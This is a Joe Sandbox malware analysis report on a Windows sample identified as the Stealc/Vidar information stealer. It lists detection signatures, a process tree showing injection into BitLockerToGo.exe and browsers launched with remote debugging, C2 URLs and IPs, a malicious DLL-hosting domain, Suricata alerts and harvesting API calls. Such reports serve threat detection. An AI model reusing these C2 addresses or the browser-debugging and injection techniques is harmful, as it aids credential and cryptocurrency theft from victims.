Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S0FTWARE.exe

Overview

General Information

Sample name:S0FTWARE.exe
Analysis ID:1560256
MD5:0da768d82b6b4b1ce65f888d4191a228
SHA1:0c040af6c4702c1efc41de91c8c670a33f91f7c1
SHA256:52d6508cc82d8084af7ed3097832a425678837366b171945a47b3d6a76f448ff
Tags:exeuser-4k95m
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • S0FTWARE.exe (PID: 8056 cmdline: "C:\Users\user\Desktop\S0FTWARE.exe" MD5: 0DA768D82B6B4B1CE65F888D4191A228)
    • BitLockerToGo.exe (PID: 7684 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 2508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 2360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 3656 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 6596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7228 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3776 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "635b5ceb8ed09951eb8d5e776815ad72"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 16 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.BitLockerToGo.exe.8e0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  3.2.BitLockerToGo.exe.8e0000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    3.2.BitLockerToGo.exe.8e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      0.2.S0FTWARE.exe.1170fec0.5.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.2.S0FTWARE.exe.1170fec0.5.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                          Click to see the 17 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Browser Started with Remote Debugging
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7684, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2508, ProcessName: chrome.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T15:48:02.385968+010020442471Malware Command and Control Activity Detected49.13.32.95443192.168.2.849715TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T15:48:04.837402+010020518311Malware Command and Control Activity Detected49.13.32.95443192.168.2.849717TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-21T15:48:04.837219+010020490871A Network Trojan was detected192.168.2.84971749.13.32.95443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: https://mvce45.cyou/vcruntime140.dllAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/sT$Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/lEAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/CDuAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/MaAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/sAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/000Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/bAvira URL Cloud: Label: malware
                          Found malware configuration
                          Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "635b5ceb8ed09951eb8d5e776815ad72"}
                          Multi AV Scanner detection for submitted file
                          Source: S0FTWARE.exeReversingLabs: Detection: 57%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: S0FTWARE.exeJoe Sandbox ML: detected
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E92A6 CryptUnprotectData,LocalAlloc,LocalFree,3_2_008E92A6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F3AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_008F3AB9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EB721 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_008EB721
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C986C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C986C80
                          Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49711 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.53.18:443 -> 192.168.2.8:49752 version: TLS 1.2
                          Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2692003466.00000000337C3000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2686848782.00000000278ED000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EA941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EA941
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_008F7178
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_008F6A05
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EE5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EE5B9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_008EC528
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008F7D20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008E1D70
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008ECE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_008ECE96
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EC888
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_008F785A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F8D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_008F8D90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EDD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_008EDD2A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_008F6E7F
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_008E149D
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_008E149D
                          Source: chrome.exeMemory has grown: Private usage: 0MB later: 38MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49717 -> 49.13.32.95:443
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.13.32.95:443 -> 192.168.2.8:49717
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.13.32.95:443 -> 192.168.2.8:49715
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199802540894
                          Source: Malware configuration extractorURLs: https://t.me/fu4chmo
                          Source: global trafficHTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                          Source: Joe Sandbox ViewIP Address: 20.25.227.174 20.25.227.174
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E688F InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_008E688F
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
